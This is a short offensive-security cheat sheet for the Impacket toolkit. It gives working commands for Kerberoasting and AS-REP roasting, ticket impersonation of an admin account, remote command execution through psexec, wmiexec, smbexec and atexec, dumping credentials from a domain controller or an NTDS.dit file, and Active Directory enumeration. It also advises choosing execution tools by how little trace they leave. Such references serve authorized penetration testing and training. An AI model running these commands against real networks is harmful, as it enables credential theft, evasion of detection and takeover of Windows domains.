Impacket

Collection of Python scripts for interacting with Windows protocols: covers Kerberos, remote execution, credential dumping, and AD enumeration from Linux.

Kerberos

bash

GetUserSPNs.py domain/user:pass -dc-ip <IP> -request
GetNPUsers.py domain/ -usersfile users.txt -dc-ip <IP>
getTGT.py domain/user:pass
getST.py domain/user:pass -spn cifs/target -impersonate admin

Remote Execution

Pick based on noise level: psexec is loudest (creates a service), wmiexec is quieter, atexec leaves the least trace.

bash

psexec.py domain/user:pass@<IP>
wmiexec.py domain/user:pass@<IP>
smbexec.py domain/user:pass@<IP>
atexec.py domain/user:pass@<IP> "whoami"

Credential Dumping

bash

secretsdump.py domain/user:pass@<IP>
secretsdump.py -ntds ntds.dit -system SYSTEM LOCAL

Enumeration

bash

lookupsid.py domain/user:pass@<IP>
samrdump.py domain/user:pass@<IP>
rpcdump.py <IP>

Impacket ​

Kerberos ​

Remote Execution ​

Credential Dumping ​

Enumeration ​

Impacket

Kerberos

Remote Execution

Credential Dumping

Enumeration